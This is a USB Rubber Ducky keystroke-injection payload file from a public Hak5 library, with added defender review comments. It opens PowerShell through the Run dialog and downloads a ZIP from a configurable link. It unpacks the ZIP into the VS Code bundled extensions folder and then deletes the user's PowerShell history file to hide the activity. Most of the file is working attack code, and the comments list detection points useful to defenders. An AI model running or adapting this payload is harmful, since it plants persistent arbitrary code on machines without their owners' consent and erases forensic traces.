GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/execution/Install_Any_Arbitrary_VSCode_Extension/payload.txt
REM_BLOCK
##########################################################
# #
# Title : Install Any Arbitrary VSCode Extension #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10 #
# #
##########################################################
END_REM

REM_BLOCK SUMMARY
What this payload types, in order:
1. Win+R, then "PowerShell" - an interactive shell as the logged-in user.
2. A PowerShell block that recursively deletes any existing folder named
   #EXTENSION_NAME under
   %USERPROFILE%\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions
3. A PowerShell block that downloads #ARCHIVE_LINK to %TEMP%, expands it
   into that same folder, deletes the ZIP, deletes the PSReadLine history
   file and exits the shell.

Review notes (defender view):
- The target path is inside the VS Code program directory of a per-user
  install, i.e. under the user profile, and the payload requests no
  elevation. Presumably VS Code treats folders there as bundled
  extensions - confirm against the VS Code version in use.
- Observable events: powershell.exe started from the Run dialog, an
  Invoke-WebRequest download by that shell, a ZIP created and removed in
  %TEMP%, new files under resources\app\extensions outside a VS Code
  update, and removal of the PSReadLine history file.
END_REM

REM Replace "example" with the name of the extension folder
REM #EXTENSION_NAME is used twice below: as the folder name under the VS Code
REM extensions directory and as the base name of the temporary ZIP in %TEMP%.
DEFINE #EXTENSION_NAME example

REM Replace "https://example.com/path/to/archive.zip" with your own ZIP Archive link
REM The value is handed unchanged to Invoke-WebRequest -Uri; the listing ships
REM only this example.com placeholder.
DEFINE #ARCHIVE_LINK https://example.com/path/to/archive.zip

EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben

REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.

USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM

REM CONFIGURATION:
REM #MAX_WAIT               - maximum number of polls in the wait loop below
REM #CHECK_INTERVAL         - DELAY between polls (150 x 20 = 3000 at most)
REM #WINDOWS_HOST_REQUEST_COUNT - threshold for the Windows heuristic below
REM #NOT_WINDOWS            - value stored in $_OS when the heuristic does not match
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7

REM Start from NOT_WINDOWS; only the IF below can change it to WINDOWS.
$_OS = #NOT_WINDOWS

REM Wait until $_RECEIVED_HOST_LOCK_LED_REPLY is no longer FALSE or the poll
REM budget is used up. No keystrokes are sent in this loop.
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
REM Heuristic: more than #WINDOWS_HOST_REQUEST_COUNT host configuration
REM requests is taken to mean Windows.
REM NOTE(review): nothing after END_EXTENSION in this payload reads $_OS, so
REM here the extension only serves as the boot delay; the keystrokes that
REM follow are sent whatever value $_OS ends up with.
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF

REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION

REM Step 1: Win+R opens the Run dialog, then "PowerShell" is typed and
REM submitted with no arguments, so the shell runs interactively as the
REM logged-in user. Both 1000 ms DELAYs are fixed waits; nothing verifies
REM that the dialog or the shell has focus before typing continues.
GUI r
DELAY 1000
STRINGLN PowerShell
DELAY 1000

REM Step 2: typed into the shell. Builds the target folder path from
REM #EXTENSION_NAME and, if a directory already exists there, deletes it
REM recursively with -Force. Everything between STRINGLN_POWERSHELL and
REM END_STRINGLN is sent as keystrokes, so no comments are placed inside.
STRINGLN_POWERSHELL
$extensionsPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"

if (Test-Path -Path $extensionsPath -PathType Container) {
Remove-Item -Recurse -Force -Path $extensionsPath
}
END_STRINGLN

REM Fixed pause after the removal block; per the original author's note the
REM time needed may depend on the extension.
DELAY 2000

REM Step 3: typed into the same shell.
REM   - Invoke-WebRequest saves #ARCHIVE_LINK to %TEMP%\#EXTENSION_NAME.zip.
REM   - Only if that file exists: Expand-Archive -Force unpacks it into the
REM     extensions folder, the ZIP is deleted, the PSReadLine history file is
REM     deleted and the shell exits. If the download fails the shell stays open.
REM   - The archive content is not inspected or verified before extraction.
REM Review notes (defender view):
REM   - Remove-Item on HistorySavePath deletes the user's whole PSReadLine
REM     history file, not only this session's lines; a missing or freshly
REM     recreated history file is itself worth noting during triage.
REM   - That deletion touches only PSReadLine's file. Process-creation and
REM     PowerShell script block logging, where enabled, are separate records
REM     and are not affected by it.
REM   - File-integrity monitoring on the VS Code resources\app\extensions
REM     directory would surface the new folder written here.
STRINGLN_POWERSHELL
$url = "#ARCHIVE_LINK"
$downloadPath = "$env:TEMP\#EXTENSION_NAME.zip"
$extractPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
Invoke-WebRequest -Uri $url -OutFile $downloadPath
if (Test-Path -Path $downloadPath) {
Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force
Remove-Item -Path $downloadPath -Force
Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
}
END_STRINGLN
